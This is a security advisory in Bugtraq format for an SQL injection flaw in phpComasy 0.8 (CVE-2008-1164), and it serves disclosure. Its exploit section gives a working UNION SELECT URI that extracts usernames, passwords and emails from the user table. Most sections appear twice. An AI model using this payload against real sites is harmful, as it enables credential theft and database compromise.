phpComasy 'index.php' SQL Injection Vulnerability
BID:28064
Info
phpComasy 'index.php' SQL Injection Vulnerability
| Bugtraq ID: | 28064 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1164 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 01 2008 12:00AM |
| Updated: | Apr 16 2015 06:05PM |
| Credit: | Cr@zy_King <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
phpComasy phpComasy 0.8 |
| Not Vulnerable: | |
Discussion
phpComasy 'index.php' SQL Injection Vulnerability
phpComasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpComasy 0.8 is vulnerable; other versions may also be affected.
phpComasy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpComasy 0.8 is vulnerable; other versions may also be affected.
Exploit / POC
phpComasy 'index.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?id=7&mod_action=project_detail&mod_project_id=-9+union+select+1,2,concat(username,0x3a,password,0x3a,email),4,5,6,7+from+user
Solution / Fix
phpComasy 'index.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].